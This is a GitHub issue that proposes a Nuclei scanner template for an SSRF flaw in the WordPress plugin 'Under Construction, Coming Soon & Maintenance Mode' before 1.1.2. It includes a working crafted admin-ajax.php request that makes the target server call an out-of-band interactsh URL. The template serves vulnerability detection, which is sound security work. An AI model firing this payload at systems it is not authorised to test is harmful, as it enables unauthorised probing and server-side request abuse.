### ISSUE TITLE
Under Construction, Coming Soon & Maintenance Mode < 1.1.2 - SSRF

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4332]
```yaml
id: under-construction-ssrf

info:
  name: Under Construction, Coming Soon & Maintenance Mode < 1.1.2 - Server Side Request Forgery (SSRF) & RXSS
  author: Akincibor
  severity: high
  description: The includes/mc-get_lists.php file used the 'apiKey' POST parameter to create an https URL from it without sanitisation and called it with cURL, leading to a SSRF issue. The issue is exploitable via direct access to the affected file, and ucmm_mc_api AJAX call (available to both authenticated and unauthenticated users).
  reference:
    - https://wpscan.com/vulnerability/24784c84-3efd-4166-81c1-e5a266562cfc
    - https://packetstormsecurity.com/files/161576/
  tags: ssrf,xss,wp,wp-plugin,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ucmm_mc_api&apiKey=-{{interactsh-url}}:8765/test/test/test?key1=val1&dummy='

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
```
